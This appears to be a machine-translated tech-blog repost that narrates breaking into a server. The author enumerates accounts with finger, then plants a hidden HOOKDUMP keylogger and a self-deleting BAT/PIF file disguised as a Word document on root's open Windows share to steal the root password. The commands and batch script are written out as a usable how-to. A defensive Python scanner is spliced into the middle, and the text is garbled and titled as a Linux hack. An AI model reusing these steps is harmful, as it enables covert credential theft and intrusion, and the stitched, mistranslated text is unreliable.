2025-01-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
Xiaobian would like to share with you how hackers break into a Linux system. I believe most people still do not know how, so this article is shared for everyone's reference; I hope you gain a lot from reading it. Let's go through it together!
I found a Web site and went into it as usual. Good, its FINGER was open, so I put together a SHELL script and tried accounts from aaa to zzz (by the way, this is a rule I found online: the length of an account name is directly proportional to the strength of its password; if an account is only two or three characters long, its password is generally very simple, and vice versa, so it is called Ruo's theorem). The result was that none of those accounts existed, and I did not try its other accounts, because I was attracted by the ports it had open: WWW was open, and I did not believe it made no mistakes. I took five CGI and WWW scanners in a row and scanned for a total of 300 or 400 common errors. Almost none of them existed. Let's take a look at the root information:
finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account
Directory: / Shell: /bin/sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan.
Root comes often; that 202.xx.xx.xx is the workstation he uses. Can we see something from there?
net view \\202.xx.xx.xx
Shared resources at \\202.xx.xx.xx
Sharename Type Comment
x
x
my briefcase
The command was completed successfully.
Windows' "File and Printer Sharing" service was open on an Internet-connected machine, something many people take lightly, and this root is no exception. If its C drive had been shared and writable, that would have been good, but that is a dream: the shares now open are not root directories, not even the D drive. Take your time. Take your time. The folders marked X are useless; they cannot be written to and are full of English originals, so this root is quite good. "My Briefcase" caught my attention. It is a tool for synchronizing data between different machines. Obviously the root has to update the home page on the host frequently, sometimes on his own machine, sometimes on the host... so it is important to note that a shared "My Briefcase" is generally writable!
Then I'll go in and have a look.
>net use i: \\202.xx.xx.xx
>i:
>echo asdf>temp.txt
Yes, indeed, it is.
>del temp.txt
Leave no trace--hacker habit.
>dir/od/p
Look at what's in there... what's in the second row from the bottom? "X Month Work Plan.doc"! That's it. Since it's a plan, it can't just be thrown aside after being written; it will definitely be opened again, at least copied when next month's plan is written :->
It's time to do it. My goal is to get him to open it again, fall into my trap and run my Trojan horse. This time I used a keyboard recording program, HOOKDUMP. I think it is very good: affordable price, sufficient quantity... sorry, force of habit. It not only records all keystrokes but also records which programs are opened or closed, which buttons are pressed, which menus are used... In short, its log lets you stand behind him and watch him operate the computer in detail. Why not use one of the many other Trojan horses? Whether it is China's Ice River or netspy, or the foreign netbus or BO, all of them are listed as the number one detection target by every anti-virus product, and can a root's machine not have anti-virus software installed? HOOKDUMP is still good, small and inconspicuous, but if everyone uses it, I'm afraid I'll have fewer chances to use it again...
>copy hookdump.* i:
One more point: before uploading, first edit its hookdump.ini file and set it to run hidden, or when root runs it a large window will pop up on the screen...
Then create a BAT file with the same name on your own machine: X Month Work Plan.BAT
>edit c:\X month work plan.BAT
@echo off
hookdump
attrib -h X month work plan.doc
C:\Program Files\Microsoft Office\Winword X Monthly Work Plan.doc
attrib -h temp.bat
del temp.pif
del temp.bat
Do you understand? When root runs this BAT file, it actually runs the Trojan first, then calls WINWORD to open the file he wants to open, and then deletes itself. Maybe the location of WINWORD on his machine is different and that call will fail, but it doesn't matter; the BAT will be deleted immediately anyway, and he will think it was his own misoperation.
Now the root directory of your C drive has such a BAT file, and its square icon looks very different from that WORD file, so how could root run it? It doesn't matter. Right-click on this file, click Properties, and select "Change Icon" in the "Program" tab. Isn't that enough? The Word icon is in your C:\Program Files\Microsoft Office. Also change "Run" to "Minimized" and check "Close on Exit" to make sure there is no sign at all when it runs. In fact, this BAT file becomes two files: a PIF file now carries its icon.
Send these two files:
>copy X month work plan.bat i:
>copy X month work plan.pif i:
Then hide his file and my own file:
>attrib +h X Monthly Work Plan.doc
>attrib +h X monthly work plan.bat
In this way, root's "briefcase" has only a WORD icon identical to the original, which he never dreamed has become a BAT file. Then we can catch our breath and wait quietly...
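As an added defender-side check (not part of the original article), the following Python scans a directory listing for the pattern described above: a document whose name is reused by a BAT/PIF twin, with the original document hidden and the executable twin left visible. The listing, file names and the tool name `hookdump` are constructed for illustration; on a real share the listing would be built from the file system's hidden attributes.

```python
"""Flag 'hidden document with visible executable twin' files in a share listing.
Added example; not code from the original article.  Works on a constructed
listing of (filename, is_hidden) pairs so it runs offline."""
from collections import defaultdict
from pathlib import PureWindowsPath

DOC_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".txt"}
EXEC_EXTS = {".bat", ".cmd", ".pif", ".com", ".exe", ".scr", ".lnk"}
# Artifact names worth flagging on their own; taken from the article.
KNOWN_TOOL_STEMS = {"hookdump"}


def find_masquerade_twins(listing):
    """Return one finding per document stem that also has an executable twin.
    listing: iterable of (filename, is_hidden).  Severity is 'high' when the
    document is hidden while at least one executable twin is visible, which is
    exactly the end state the article's trick leaves behind."""
    by_stem = defaultdict(dict)
    for name, hidden in listing:
        p = PureWindowsPath(name)
        by_stem[p.stem.casefold()][p.suffix.casefold()] = (name, hidden)
    findings = []
    for stem, variants in by_stem.items():
        docs = [v for ext, v in variants.items() if ext in DOC_EXTS]
        execs = [v for ext, v in variants.items() if ext in EXEC_EXTS]
        if not docs or not execs:
            continue  # a lone document or a lone executable is not the pattern
        hidden_doc = any(h for _, h in docs)
        visible_exec = any(not h for _, h in execs)
        findings.append({
            "stem": stem,
            "documents": sorted(n for n, _ in docs),
            "executables": sorted(n for n, _ in execs),
            "severity": "high" if hidden_doc and visible_exec else "medium",
        })
    return findings


def find_known_tool_artifacts(listing):
    """Return file names whose stem matches a known keylogger/tool name."""
    return sorted(n for n, _ in listing
                  if PureWindowsPath(n).stem.casefold() in KNOWN_TOOL_STEMS)


# Constructed listing reproducing the share's state after the steps above.
SAMPLE_LISTING = [
    ("readme.txt", False),
    ("X month work plan.doc", True),   # original document, now hidden
    ("X month work plan.bat", True),   # planted BAT, hidden
    ("X month work plan.pif", False),  # PIF carrying the Word icon, visible
    ("hookdump.exe", False),
    ("hookdump.ini", False),
    ("budget.xls", False),
]

if __name__ == "__main__":
    for f in find_masquerade_twins(SAMPLE_LISTING):
        print(f["severity"], f["stem"], f["executables"])
    print("tool artifacts:", find_known_tool_artifacts(SAMPLE_LISTING))
```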
A few days later, I went into the workstation, took down the keystroke log, found the root password, and entered the mainframe.
That's all for "How Hackers Hack Linux"; thanks for reading! I believe everyone now has some understanding of it. I hope the content shared here helps everyone, and if you still want to learn more, welcome to follow the industry information channel!